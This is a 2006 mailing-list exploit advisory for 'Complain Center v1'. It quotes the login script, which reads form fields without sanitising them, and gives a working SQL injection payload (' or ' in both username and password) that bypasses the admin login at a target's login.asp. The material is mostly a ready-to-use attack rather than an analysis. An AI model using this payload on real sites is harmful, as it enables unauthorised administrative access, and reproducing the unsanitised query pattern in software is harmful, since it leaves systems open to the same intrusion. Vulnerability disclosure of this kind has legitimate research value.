Complain Center v1(loginprocess.asp) Admin ByPASS SQL Injection
Date: 14 Sep 2006 20:02:01 -0000
From: [email protected]
To: [email protected]
Subject: Complain Center v1(loginprocess.asp) Admin ByPASS SQL Injection
X-Virus-Scanned: antivirus-gw at tyumen.ru
ENGLISH
# Title : Complain Center v1(loginprocess.asp) Admin ByPASS SQL Injection
# Author : ajann
# Exploit;
loginprocess.asp:
..
...
dim varUser
dim varPass
varUser=Request.Form("TxtUser") No Secure : )
varPass=Request.Form("TxtPass") No Secure : )
..
...
//Before join login page
http://[target]/[path]/login.asp
Username : ' or '
Password : ' or ' and Login Ok
# ajann,Turkey
